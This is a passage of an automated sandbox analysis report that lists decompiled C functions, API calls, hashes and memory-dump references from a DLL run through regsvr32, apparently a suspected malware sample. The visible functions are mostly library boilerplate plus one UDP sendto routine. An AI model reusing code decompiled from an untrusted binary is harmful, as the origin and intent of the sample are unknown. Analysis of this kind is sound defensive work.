                                                                                                        • String ID:
                                                                                                        • API String ID: 4210924919-0
                                                                                                        • Opcode ID: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
                                                                                                        • Instruction ID: 30a1eb16c1be1d822a6ca59f9e75d62d608c78195c8382286e316af6553577e2
                                                                                                        • Opcode Fuzzy Hash: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
                                                                                                        • Instruction Fuzzy Hash: 25018076900219BBDB00DF648C85FAF77BCEF48754F104469FA01AB181DA74E94597A4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 91%
                                                                                                        			E1000B244(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __esi;
                                                                                                        				void* _t16;
                                                                                                        				int _t17;
                                                                                                        				int _t18;
                                                                                                        				struct HWND__* _t19;
                                                                                                        				intOrPtr _t25;
                                                                                                        				intOrPtr _t33;
                                                                                                        				void* _t35;
                                                                                                        
                                                                                                        				_t32 = __edi;
                                                                                                        				_t35 = __ecx;
                                                                                                        				_t25 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                                        				if(_t25 == 0) {
                                                                                                        					__eflags =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                        					if(__eflags == 0) {
                                                                                                        						L3:
                                                                                                        						_t17 = E1000A0DB(0, _t25, _t32, _t35, _t39);
                                                                                                        						L4:
                                                                                                        						asm("sbb edx, edx");
                                                                                                        						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
                                                                                                        						L11:
                                                                                                        						 *((intOrPtr*)(_t35 + 0x18)) = 1;
                                                                                                        						return _t18;
                                                                                                        					}
                                                                                                        					__eflags = _a4;
                                                                                                        					if(_a4 == 0) {
                                                                                                        						_push(__edi);
                                                                                                        						_t33 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                        						_t19 = GetFocus();
                                                                                                        						__eflags = _t19 -  *(_t33 + 0x20);
                                                                                                        						if(_t19 ==  *(_t33 + 0x20)) {
                                                                                                        							SendMessageA( *(E1000FB5C(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t18 = E10012913( *((intOrPtr*)(_t35 + 0x14)), _a4);
                                                                                                        					goto L11;
                                                                                                        				}
                                                                                                        				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
                                                                                                        					_t17 =  *(__ecx + 8);
                                                                                                        					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                        					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                        						goto L4;
                                                                                                        					}
                                                                                                        					goto L3;
                                                                                                        				}
                                                                                                        				return _t16;
                                                                                                        			}












                                                                                                        0x1000b244
                                                                                                        0x1000b246
                                                                                                        0x1000b248
                                                                                                        0x1000b24f
                                                                                                        0x1000b284
                                                                                                        0x1000b287
                                                                                                        0x1000b25e
                                                                                                        0x1000b25e
                                                                                                        0x1000b263
                                                                                                        0x1000b269
                                                                                                        0x1000b27c
                                                                                                        0x1000b2c7
                                                                                                        0x1000b2c7
                                                                                                        0x00000000
                                                                                                        0x1000b2c7
                                                                                                        0x1000b289
                                                                                                        0x1000b28d
                                                                                                        0x1000b28f
                                                                                                        0x1000b290
                                                                                                        0x1000b293
                                                                                                        0x1000b299
                                                                                                        0x1000b29c
                                                                                                        0x1000b2b4
                                                                                                        0x1000b2b4
                                                                                                        0x1000b2ba
                                                                                                        0x1000b2c2
                                                                                                        0x00000000
                                                                                                        0x1000b2c2
                                                                                                        0x1000b254
                                                                                                        0x1000b256
                                                                                                        0x1000b259
                                                                                                        0x1000b25c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000b25c
                                                                                                        0x1000b2d0

                                                                                                        APIs
                                                                                                        • EnableMenuItem.USER32 ref: 1000B27C
                                                                                                          • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                          • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                        • GetFocus.USER32 ref: 1000B293
                                                                                                        • GetParent.USER32(?), ref: 1000B2A1
                                                                                                        • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 1000B2B4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3849708097-0
                                                                                                        • Opcode ID: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
                                                                                                        • Instruction ID: 6f1bf2e13571d4607552996c72993327e3919edcc1f96bcd7a145644f4ad6856
                                                                                                        • Opcode Fuzzy Hash: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
                                                                                                        • Instruction Fuzzy Hash: FB115B71500A11AFE720DF64CCC9D1EBBF6FF893A5B118A2DF186869A8C731AC45CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 77%
                                                                                                        			E1001044A(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct HWND__* _t16;
                                                                                                        				struct HWND__* _t18;
                                                                                                        				struct HWND__* _t20;
                                                                                                        				void* _t22;
                                                                                                        				void* _t23;
                                                                                                        				void* _t24;
                                                                                                        				struct HWND__* _t25;
                                                                                                        
                                                                                                        				_t23 = __ecx;
                                                                                                        				_t22 = __ebx;
                                                                                                        				_t24 = GetTopWindow;
                                                                                                        				_t16 = GetTopWindow(_a4);
                                                                                                        				while(1) {
                                                                                                        					_t25 = _t16;
                                                                                                        					if(_t25 == 0) {
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					__eflags = _a24;
                                                                                                        					if(__eflags == 0) {
                                                                                                        						SendMessageA(_t25, _a8, _a12, _a16);
                                                                                                        					} else {
                                                                                                        						_t20 = E1000FB83(_t23, _t24, _t25, __eflags, _t25);
                                                                                                        						__eflags = _t20;
                                                                                                        						if(__eflags != 0) {
                                                                                                        							_push(_a16);
                                                                                                        							_push(_a12);
                                                                                                        							_push(_a8);
                                                                                                        							_push( *((intOrPtr*)(_t20 + 0x20)));
                                                                                                        							_push(_t20);
                                                                                                        							E1001016F(_t22, _t24, _t25, __eflags);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					__eflags = _a20;
                                                                                                        					if(_a20 != 0) {
                                                                                                        						_t18 = GetTopWindow(_t25);
                                                                                                        						__eflags = _t18;
                                                                                                        						if(_t18 != 0) {
                                                                                                        							E1001044A(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t16 = GetWindow(_t25, 2);
                                                                                                        				}
                                                                                                        				return _t16;
                                                                                                        			}













                                                                                                        0x1001044a
                                                                                                        0x1001044a
                                                                                                        0x10010452
                                                                                                        0x10010458
                                                                                                        0x100104bb
                                                                                                        0x100104bb
                                                                                                        0x100104bf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001045c
                                                                                                        0x10010460
                                                                                                        0x1001048a
                                                                                                        0x10010462
                                                                                                        0x10010463
                                                                                                        0x10010468
                                                                                                        0x1001046a
                                                                                                        0x1001046c
                                                                                                        0x1001046f
                                                                                                        0x10010472
                                                                                                        0x10010475
                                                                                                        0x10010478
                                                                                                        0x10010479
                                                                                                        0x10010479
                                                                                                        0x1001046a
                                                                                                        0x10010490
                                                                                                        0x10010494
                                                                                                        0x10010497
                                                                                                        0x10010499
                                                                                                        0x1001049b
                                                                                                        0x100104ad
                                                                                                        0x100104ad
                                                                                                        0x1001049b
                                                                                                        0x100104b5
                                                                                                        0x100104b5
                                                                                                        0x100104c4

                                                                                                        APIs
                                                                                                        • GetTopWindow.USER32(00000000), ref: 10010458
                                                                                                        • GetTopWindow.USER32(00000000), ref: 10010497
                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 100104B5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window
                                                                                                        • String ID:
                                                                                                        • API String ID: 2353593579-0
                                                                                                        • Opcode ID: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
                                                                                                        • Instruction ID: cb0d0bbe13ee34529c330f041d0b53c98759dff42d13bab1c22f515cd31b8fc3
                                                                                                        • Opcode Fuzzy Hash: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
                                                                                                        • Instruction Fuzzy Hash: CD01257620061ABBDF12DF908C44E9F3A6AEF08390F018014FE8458060C7B6D9A2EBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100223DD(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                        				intOrPtr _t25;
                                                                                                        				void* _t26;
                                                                                                        				void* _t28;
                                                                                                        				void* _t29;
                                                                                                        
                                                                                                        				_t28 = __ebx;
                                                                                                        				_t25 = _a16;
                                                                                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                        					_t26 = E10021CDA(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                        					goto L9;
                                                                                                        				} else {
                                                                                                        					_t35 = _t25 - 0x66;
                                                                                                        					if(_t25 != 0x66) {
                                                                                                        						__eflags = _t25 - 0x61;
                                                                                                        						if(_t25 == 0x61) {
                                                                                                        							L7:
                                                                                                        							_t26 = E10021DC6(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                        						} else {
                                                                                                        							__eflags = _t25 - 0x41;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								goto L7;
                                                                                                        							} else {
                                                                                                        								_t26 = E100222E5(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                        							}
                                                                                                        						}
                                                                                                        						L9:
                                                                                                        						return _t26;
                                                                                                        					} else {
                                                                                                        						return E1002222C(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}







                                                                                                        0x100223dd
                                                                                                        0x100223e0
                                                                                                        0x100223e6
                                                                                                        0x10022459
                                                                                                        0x00000000
                                                                                                        0x100223ed
                                                                                                        0x100223ed
                                                                                                        0x100223f0
                                                                                                        0x1002240b
                                                                                                        0x1002240e
                                                                                                        0x1002242e
                                                                                                        0x10022440
                                                                                                        0x10022410
                                                                                                        0x10022410
                                                                                                        0x10022413
                                                                                                        0x00000000
                                                                                                        0x10022415
                                                                                                        0x10022427
                                                                                                        0x10022427
                                                                                                        0x10022413
                                                                                                        0x1002245e
                                                                                                        0x10022462
                                                                                                        0x100223f2
                                                                                                        0x1002240a
                                                                                                        0x1002240a
                                                                                                        0x100223f0

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                        • String ID:
                                                                                                        • API String ID: 3016257755-0
                                                                                                        • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                        • Instruction ID: 8dbc0b72f00ea763734ae0c8b1a7260823f108f727578f4f2c9ad294c4834352
                                                                                                        • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                        • Instruction Fuzzy Hash: 4201287A40014ABBCF12AEC4EC41CEE3F66FB18294B958515FE1858531D236D9B2AB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 96%
                                                                                                        			E1000FE47(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct HWND__* _t9;
                                                                                                        				struct HWND__* _t10;
                                                                                                        				void* _t14;
                                                                                                        				void* _t15;
                                                                                                        				struct HWND__* _t16;
                                                                                                        				struct HWND__* _t17;
                                                                                                        				void* _t18;
                                                                                                        
                                                                                                        				_t14 = __ecx;
                                                                                                        				_t13 = __ebx;
                                                                                                        				_t9 = GetDlgItem(_a4, _a8);
                                                                                                        				_t15 = GetTopWindow;
                                                                                                        				_t16 = _t9;
                                                                                                        				if(_t16 == 0) {
                                                                                                        					L6:
                                                                                                        					_t10 = GetTopWindow(_a4);
                                                                                                        					while(1) {
                                                                                                        						_t17 = _t10;
                                                                                                        						__eflags = _t17;
                                                                                                        						if(_t17 == 0) {
                                                                                                        							goto L10;
                                                                                                        						}
                                                                                                        						_t10 = E1000FE47(_t13, _t14, _t17, _a8, _a12);
                                                                                                        						__eflags = _t10;
                                                                                                        						if(_t10 == 0) {
                                                                                                        							_t10 = GetWindow(_t17, 2);
                                                                                                        							continue;
                                                                                                        						}
                                                                                                        						goto L10;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					if(GetTopWindow(_t16) == 0) {
                                                                                                        						L3:
                                                                                                        						_push(_t16);
                                                                                                        						if(_a12 == 0) {
                                                                                                        							return E1000FB5C(_t13, _t14, _t18);
                                                                                                        						}
                                                                                                        						_t10 = E1000FB83(_t14, _t15, _t16, __eflags);
                                                                                                        						__eflags = _t10;
                                                                                                        						if(_t10 == 0) {
                                                                                                        							goto L6;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t10 = E1000FE47(__ebx, _t14, _t16, _a8, _a12);
                                                                                                        						if(_t10 == 0) {
                                                                                                        							goto L3;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L10:
                                                                                                        				return _t10;
                                                                                                        			}













                                                                                                        0x1000fe47
                                                                                                        0x1000fe47
                                                                                                        0x1000fe52
                                                                                                        0x1000fe58
                                                                                                        0x1000fe5e
                                                                                                        0x1000fe62
                                                                                                        0x1000fe92
                                                                                                        0x1000fe95
                                                                                                        0x1000feb2
                                                                                                        0x1000feb2
                                                                                                        0x1000feb4
                                                                                                        0x1000feb6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000fea0
                                                                                                        0x1000fea5
                                                                                                        0x1000fea7
                                                                                                        0x1000feac
                                                                                                        0x00000000
                                                                                                        0x1000feac
                                                                                                        0x00000000
                                                                                                        0x1000fea7
                                                                                                        0x1000fe64
                                                                                                        0x1000fe69
                                                                                                        0x1000fe7b
                                                                                                        0x1000fe7f
                                                                                                        0x1000fe80
                                                                                                        0x00000000
                                                                                                        0x1000fe82
                                                                                                        0x1000fe89
                                                                                                        0x1000fe8e
                                                                                                        0x1000fe90
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000fe6b
                                                                                                        0x1000fe72
                                                                                                        0x1000fe79
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000fe79
                                                                                                        0x1000fe69
                                                                                                        0x1000febb
                                                                                                        0x1000febb

                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32 ref: 1000FE52
                                                                                                        • GetTopWindow.USER32(00000000), ref: 1000FE65
                                                                                                          • Part of subcall function 1000FE47: GetWindow.USER32(00000000,00000002), ref: 1000FEAC
                                                                                                        • GetTopWindow.USER32(?), ref: 1000FE95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Item
                                                                                                        • String ID:
                                                                                                        • API String ID: 369458955-0
                                                                                                        • Opcode ID: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
                                                                                                        • Instruction ID: 3243c1bb31c4da8a8ed3b9d60ce207d24ba739ee5e1db1414c8eeda74806f304
                                                                                                        • Opcode Fuzzy Hash: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
                                                                                                        • Instruction Fuzzy Hash: 07018F374016AAB7EB229F60CC00AAF3A98EF447D0F018018FD049153AD731DA12BAA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 89%
                                                                                                        			E1001D6BC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				signed int _t15;
                                                                                                        				LONG* _t21;
                                                                                                        				long _t23;
                                                                                                        				void* _t31;
                                                                                                        				LONG* _t33;
                                                                                                        				void* _t34;
                                                                                                        				void* _t35;
                                                                                                        
                                                                                                        				_t35 = __eflags;
                                                                                                        				_t29 = __edx;
                                                                                                        				_t25 = __ebx;
                                                                                                        				_push(0xc);
                                                                                                        				_push(0x1002fae0);
                                                                                                        				E1001984C(__ebx, __edi, __esi);
                                                                                                        				_t31 = E1001BF79(__edx, __edi, _t35);
                                                                                                        				_t15 =  *0x1005826c; // 0xfffffffe
                                                                                                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                        					E1001A549(0xd);
                                                                                                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                        					 *(_t34 - 0x1c) = _t33;
                                                                                                        					__eflags = _t33 -  *0x10058170; // 0x4a412e8
                                                                                                        					if(__eflags != 0) {
                                                                                                        						__eflags = _t33;
                                                                                                        						if(_t33 != 0) {
                                                                                                        							_t23 = InterlockedDecrement(_t33);
                                                                                                        							__eflags = _t23;
                                                                                                        							if(_t23 == 0) {
                                                                                                        								__eflags = _t33 - 0x10057d48;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									_push(_t33);
                                                                                                        									E10016380(_t25, _t31, _t33, __eflags);
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t21 =  *0x10058170; // 0x4a412e8
                                                                                                        						 *(_t31 + 0x68) = _t21;
                                                                                                        						_t33 =  *0x10058170; // 0x4a412e8
                                                                                                        						 *(_t34 - 0x1c) = _t33;
                                                                                                        						InterlockedIncrement(_t33);
                                                                                                        					}
                                                                                                        					 *(_t34 - 4) = 0xfffffffe;
                                                                                                        					E1001D757();
                                                                                                        				} else {
                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                        				}
                                                                                                        				if(_t33 == 0) {
                                                                                                        					E10017DA6(_t25, _t29, _t31, 0x20);
                                                                                                        				}
                                                                                                        				return E10019891(_t33);
                                                                                                        			}










                                                                                                        0x1001d6bc
                                                                                                        0x1001d6bc
                                                                                                        0x1001d6bc
                                                                                                        0x1001d6bc
                                                                                                        0x1001d6be
                                                                                                        0x1001d6c3
                                                                                                        0x1001d6cd
                                                                                                        0x1001d6cf
                                                                                                        0x1001d6d7
                                                                                                        0x1001d6f8
                                                                                                        0x1001d6fe
                                                                                                        0x1001d702
                                                                                                        0x1001d705
                                                                                                        0x1001d708
                                                                                                        0x1001d70e
                                                                                                        0x1001d710
                                                                                                        0x1001d712
                                                                                                        0x1001d715
                                                                                                        0x1001d71b
                                                                                                        0x1001d71d
                                                                                                        0x1001d71f
                                                                                                        0x1001d725
                                                                                                        0x1001d727
                                                                                                        0x1001d728
                                                                                                        0x1001d72d
                                                                                                        0x1001d725
                                                                                                        0x1001d71d
                                                                                                        0x1001d72e
                                                                                                        0x1001d733
                                                                                                        0x1001d736
                                                                                                        0x1001d73c
                                                                                                        0x1001d740
                                                                                                        0x1001d740
                                                                                                        0x1001d746
                                                                                                        0x1001d74d
                                                                                                        0x1001d6df
                                                                                                        0x1001d6df
                                                                                                        0x1001d6df
                                                                                                        0x1001d6e4
                                                                                                        0x1001d6e8
                                                                                                        0x1001d6ed
                                                                                                        0x1001d6f5

                                                                                                        APIs
                                                                                                          • Part of subcall function 1001BF79: __getptd_noexit.LIBCMT ref: 1001BF7A
                                                                                                          • Part of subcall function 1001BF79: __amsg_exit.LIBCMT ref: 1001BF87
                                                                                                        • __amsg_exit.LIBCMT ref: 1001D6E8
                                                                                                        • __lock.LIBCMT ref: 1001D6F8
                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 1001D715
                                                                                                        • InterlockedIncrement.KERNEL32(04A412E8), ref: 1001D740
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2880340415-0
                                                                                                        • Opcode ID: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
                                                                                                        • Instruction ID: ba7e7af5003a78fddfad0021ce05134b2f36e9a59f0d2c47ef46babd1389d2ef
                                                                                                        • Opcode Fuzzy Hash: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
                                                                                                        • Instruction Fuzzy Hash: 95016D39904A21EBEB41FB65988679D77A4FF05790F11410AE804AF291DB34E9C2CB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 25%
                                                                                                        			E10001360(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                        				signed int _v8;
                                                                                                        				short _v20;
                                                                                                        				short _v22;
                                                                                                        				char _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				signed int _t15;
                                                                                                        				short _t18;
                                                                                                        				intOrPtr _t31;
                                                                                                        				signed int _t33;
                                                                                                        
                                                                                                        				_t15 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_v8 = _t15 ^ _t33;
                                                                                                        				_v28 = __ecx;
                                                                                                        				_t18 = E100174D0(_t31,  &_v24, 0, 0x10);
                                                                                                        				_v24 = 2;
                                                                                                        				__imp__#11(_a4);
                                                                                                        				_v20 = _t18;
                                                                                                        				__imp__#9(_a8);
                                                                                                        				_v22 = _t18;
                                                                                                        				__imp__#20(_a12, _a16, 0,  &_v24, 0x10);
                                                                                                        				return E100167D5(_v28, __ebx, _v8 ^ _t33, _a12, _t31, __esi,  *((intOrPtr*)(_v28 + 0x24)));
                                                                                                        			}












                                                                                                        0x10001366
                                                                                                        0x1000136d
                                                                                                        0x10001370
                                                                                                        0x1000137b
                                                                                                        0x10001383
                                                                                                        0x1000138d
                                                                                                        0x10001393
                                                                                                        0x1000139b
                                                                                                        0x100013a1
                                                                                                        0x100013bc
                                                                                                        0x100013cf

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 1000137B
                                                                                                        • inet_addr.WS2_32(?), ref: 1000138D
                                                                                                        • htons.WS2_32(?), ref: 1000139B
                                                                                                        • sendto.WS2_32(?,?,00000002,00000000,00000002,00000010), ref: 100013BC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memsethtonsinet_addrsendto
                                                                                                        • String ID:
                                                                                                        • API String ID: 1158618643-0
                                                                                                        • Opcode ID: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
                                                                                                        • Instruction ID: 4ca8e198367322d4385a70dad1c3d41f0382a071c465ebc2c9307440f54d584b
                                                                                                        • Opcode Fuzzy Hash: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
                                                                                                        • Instruction Fuzzy Hash: D0017CB590020DABDB00DFA4CC86EAE77B8FF48300F104419F905AB281EB70AA40DBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000CCD3() {
                                                                                                        				intOrPtr _t16;
                                                                                                        				struct HWND__* _t19;
                                                                                                        				intOrPtr _t23;
                                                                                                        				intOrPtr* _t28;
                                                                                                        				void* _t29;
                                                                                                        
                                                                                                        				_t28 =  *((intOrPtr*)(_t29 - 0x20));
                                                                                                        				_t23 =  *((intOrPtr*)(_t29 - 0x24));
                                                                                                        				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
                                                                                                        					E10012913(_t23, 1);
                                                                                                        				}
                                                                                                        				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
                                                                                                        					EnableWindow( *(_t29 - 0x14), 1);
                                                                                                        				}
                                                                                                        				if( *(_t29 - 0x14) != 0) {
                                                                                                        					_t19 = GetActiveWindow();
                                                                                                        					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
                                                                                                        					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
                                                                                                        						SetActiveWindow( *(_t29 - 0x14));
                                                                                                        					}
                                                                                                        				}
